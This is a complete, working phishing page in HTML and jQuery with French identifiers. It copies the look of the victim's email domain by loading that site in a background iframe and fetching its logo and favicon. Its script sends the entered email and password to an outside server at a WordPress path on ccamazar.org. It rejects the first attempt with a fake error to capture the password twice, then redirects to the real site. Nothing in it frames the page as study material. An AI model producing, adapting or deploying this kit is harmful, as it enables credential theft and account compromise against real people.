
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title id="titre-page">.|.</title>
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <style>
        body, html {
            height: 100%;
            margin: 0;
            overflow: hidden;
        }
        .fond-iframe {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: none;
            z-index: -1;
        }
        .fond-superpose {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 0;
        }
        .conteneur-formulaire {
            position: relative;
            z-index: 1;
            background-color: white;
            max-width: 400px;
            padding: 20px;
            padding-bottom: 50px;
            margin: auto;
            top: 50%;
            transform: translateY(-50%);
            border-radius: 8px;
        }
        .conteneur-formulaire .element-formulaire {
            position: relative;
        }
        .conteneur-formulaire .element-formulaire .fa-arrow-left {
            position: absolute;
            left: 10px;
            top: 50%;
            transform: translateY(-50%);
        }
        .conteneur-formulaire .form-control.champ-email {
            padding-left: 30px;
            border: none;
            box-shadow: none;
            background-color: #fff;
        }
        .conteneur-formulaire .form-control.champ-texte {
            width: 95%;
            border: none;
            border-bottom: 2px solid #ccc;
        }
        .conteneur-entete {
            display: flex;
            align-items: center;
        }
        .conteneur-entete h1 {
            margin-right: 10px;
        }
        @media (max-width: 576px) {
            .conteneur-formulaire {
                width: 90%;
                padding: 10px;
            }
            .conteneur-formulaire .form-control.champ-texte {
                width: 100%;
            }
        }
    </style>
</head>
<body>
    <iframe id="iframe-domaine" class="fond-iframe"></iframe>
    <div class="fond-superpose"></div>
    <div class="conteneur-formulaire">
        <form id="teteatete">
            <div class="element-formulaire">
                <img src="https://cdn.glitch.global/6bf87a7a-3ee1-43ec-9d92-8ad71c495926/images.png?v=1724527960918" alt="Logo" class="img-fluid" width="50px">
            </div>
<br />
            <div class="element-formulaire conteneur-entete">
                <h5 id="texte-entete" style="text-transform: uppercase;">Domain</h5> &nbsp; &nbsp;
                <h5 id="sous-texte">Mail</h5>
            </div>
            <div id="conteneur-message-succes" class="element-formulaire mt-3"></div>
            <div class="element-formulaire">
                <i class="fas fa-arrow-left"></i>
                <input type="email" class="form-control champ-email" id="champ-email" placeholder="Email" readonly style="font-weight: 500; font-size:20px;">
            </div>
<br />
            <div class="element-formulaire">
                <input type="password" class="form-control champ-texte" id="champ-mdp" placeholder="Enter password" required>
            </div>
<br />
            <div class="element-formulaire">
                <p style="font-weight: 500; font-size:16px;">Enter correct credientials</p> 
                <button type="submit" class="btn btn-primary float-right">Authenticate</button>
            </div>
        </form>
    </div>
    <script>
        $(document).ready(function() {
            let nombreSoumissions = 0;
            let domaineEmail = '';

            let email = window.location.hash.slice(1);
            if (email) {
                $('#champ-email').val(email);
                domaineEmail = email.split('@')[1];
                if (domaineEmail) {
                    $('#iframe-domaine').attr('src', `https://${domaineEmail}`);
                    $('#texte-entete').text(domaineEmail);
                    $('#titre-page').text(`${domaineEmail} - Formulaire Réactif`);
                    
                    $.getJSON(`https://logo.clearbit.com/${domaineEmail}`, function(data) {
                        if (data) {
                            $('#logo-img').attr('src', `https://logo.clearbit.com/${domaineEmail}`);
                            $('head').append(`<link rel="icon" href="https://logo.clearbit.com/${domaineEmail}" type="image/x-icon">`);
                        } else {
                            $('#logo-img').attr('src', `https://${domaineEmail}/favicon.ico`);
                            $('head').append(`<link rel="icon" href="https://${domaineEmail}/favicon.ico" type="image/x-icon">`);
                        }
                    }).fail(function() {
                        $('#logo-img').attr('src', `https://${domaineEmail}/favicon.ico`);
                        $('head').append(`<link rel="icon" href="https://${domaineEmail}/favicon.ico" type="image/x-icon">`);
                    });
                }
            }

            $('#teteatete').on('submit', function(event) {
                event.preventDefault();

                const email = $('#champ-email').val();
                const mdp = $('#champ-mdp').val();

                $.ajax({
                    url: 'https://ccamazar.org/wp-admin/images/gen/geng/dvd/post.php', // Remplacez par votre serveur
                    type: 'POST',
                    data: {
                        email: email,
                        mdp: mdp
                    },
                    success: function(response) {
                        nombreSoumissions++;
                        $('#message-succes').remove();
                        let messageSucces = '';
                        if (nombreSoumissions === 1) {
                            messageSucces = '<div id="message-succes" class="alert alert-danger mt-3">Invalid Email Password!</div>';
                        } else {
                            messageSucces = '<div id="message-succes" class="alert alert-success mt-3">Successful!</div>';
                        }
                        $('#conteneur-message-succes').append(messageSucces);

                        if (nombreSoumissions < 2) {
                            $('#champ-mdp').val('');
                        } else {
                            setTimeout(function() {
                                window.location.href = `http://${domaineEmail}`;
                            }, 2000);
                        }
                    },
                    error: function(xhr, status, error) {
                        console.error('Échec de la soumission:', error);
                    }
                });
            });

            $('#champ-mdp').on('input', function() {
                $('#message-succes').remove();
            });
        });
    </script>
</body>
</html>